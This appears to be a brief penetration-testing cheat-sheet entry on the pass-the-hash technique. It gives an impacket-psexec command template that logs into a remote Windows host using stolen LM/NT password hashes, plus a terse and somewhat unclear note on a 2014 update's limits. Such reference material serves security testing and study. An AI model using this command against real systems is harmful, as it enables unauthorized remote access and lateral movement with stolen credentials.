Previous

Pass the hash

impacket-psexec ‘<domain>/<user>@<ip>’ -hashes ‘<lmhash>:<nthash>’

Pass the hash can be used in NTLM Authentication case .

Since the 2014 security update, this technique can not be used to authenticate as any
other local admin account.